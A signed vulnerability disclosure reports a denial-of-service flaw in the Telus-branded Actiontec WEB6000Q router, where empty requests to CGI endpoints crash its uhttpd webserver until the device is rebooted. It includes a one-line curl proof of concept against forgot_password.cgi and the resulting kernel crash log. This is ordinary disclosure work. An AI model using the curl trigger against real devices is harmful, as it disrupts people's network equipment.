Share
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
### Device Details  
Discovered By: Andrew Klaus (andrew@aklaus.ca)  
Vendor: Actiontec (Telus Branded)  
Model: WEB6000Q  
Affected Firmware: 1.1.02.22  
  
Reported: July 2018  
CVE: Not needed since update is pushed by the provider.  
  
  
### Summary of Findings  
By querying CGI endpoints with empty (GET/POST/HEAD) requests causes a  
Segmentation Fault of the uhttpd webserver. Since there is no watchdog  
on this daemon, a device reboot is needed to restart the webserver to  
make any modification to the device.  
  
### Proof of Concept:  
  
$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi  
curl: (52) Empty reply from server  
  
$ curl -X POST -ik http://192.168.1.2/forgot_password.cgi  
curl: (7) Failed to connect to 192.168.1.2 port 80: Connection refused  
  
  
### UART console output after attack:  
  
<4>[ 726.578000] uhttpd/452: potentially unexpected fatal signal 11.  
<4>[ 726.583000]  
<4>[ 726.585000] Cpu 1  
<4>[ 726.587000] $ 0 : 00000000 10008d00 00000000 00000000  
<4>[ 726.592000] $ 4 : 00000000 00000000 00000000 00000000  
<4>[ 726.598000] $ 8 : 81010100 3d3d3d3d 77a00000 f0000000  
<4>[ 726.603000] $12 : 00000001 6570743a 202a2f2a 00416b5c  
<4>[ 726.608000] $16 : 00000000 00000000 00000000 7fe14ebe  
<4>[ 726.614000] $20 : 00404c84 775168a0 0046d470 0084ee6c  
<4>[ 726.619000] $24 : 00000186 00411030  
<4>[ 726.624000] $28 : 00464620 7fe12800 7fe12800 00416c20  
<4>[ 726.630000] Hi : 000000c9  
<4>[ 726.633000] Lo : 0001e791  
<4>[ 726.636000] epc : 00411078 0x411078  
<4>[ 726.640000] Tainted: P  
<4>[ 726.643000] ra : 00416c20 0x416c20  
<4>[ 726.647000] Status: 00008d13 USER EXL IE  
<4>[ 726.652000] Cause : 00000008  
<4>[ 726.655000] BadVA : 00000000  
<4>[ 726.657000] PrId : 0002a080 (Broadcom BMIPS4350)  
<4>[ 726.663000]  
<4>[ 726.663000] Userspace Call Trace: process uhttpd, pid 452, signal  
11  
<4>[ 726.671000] [<00411078>] /sbin/uhttpd  
<4>[ 726.674000] [<00416c20>] /sbin/uhttpd  
<4>[ 726.678000] [<00416d68>] /sbin/uhttpd  
<4>[ 726.682000] [<00407cd4>] /sbin/uhttpd  
<4>[ 726.686000] [<00416c20>] /sbin/uhttpd  
<4>[ 726.689000] [<0047cb94>] (unknown)  
  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz9T/cACgkQoyRid8jQ  
fpl0pQ/8Cy5KVRr9A21pitkXvN4tfSg2xLW3JPCM5u9YTVyat8/OXBJH4fFro0qg  
lu47mquRCKEC98IqMfHDiiq7x75iAWTfGOtB3k9Kk4xfdtwdQP8yKy8do8dHr9No  
FgmNh0+MFK0fvEju5hyzDDU7jBIAKAcjxQGU974B96ai+7p5yjm0rziwMVRK10UA  
Bfc7kIZVAKTxvJkVtThBihkJ2+Szq33j+DwC1F64ePx++SZIJO+sHMY28MU/Kzdb  
BmUUfhPQhla0pSZ1S1TTcOzNE+j7YrvQZ8mJ8fVJ7c/tOkG1u7xN/i8DpikF/46Z  
nlmERr5wqRHvpsPsrmjEJPOnECRhcK9GRAlxiZJIXExzRv94hwJnGAMVXBqNw/81  
GHhwnXW7efQpPNiuV9P9GnNiBuTL5I+eQR6aJn5rMl+h9em8+6YyU6Aguf+z5UJC  
eBsaTRHIl6PReTCaBbZR7lOG2KqP485LM7bwDSFej0lRWStmrB624O48Qqr6wbDf  
UW639RG4J7J1Qtoc+Gu8PgXcXWV9HY4KH1Edt4cSowveOn1LmQEsmFOeoBC5FKbQ  
bIqB1uYTTjmO/ey/ysh2GbXkNym6xNJYa1RCZt+S0T0T/qPjPQa+IVO59lygQhtm  
GHNRPP43+TkLyXhvWMjl4Ptat2b/gd99DMqO/VnLqrZEWD2rXx8=  
=IEzI  
-----END PGP SIGNATURE-----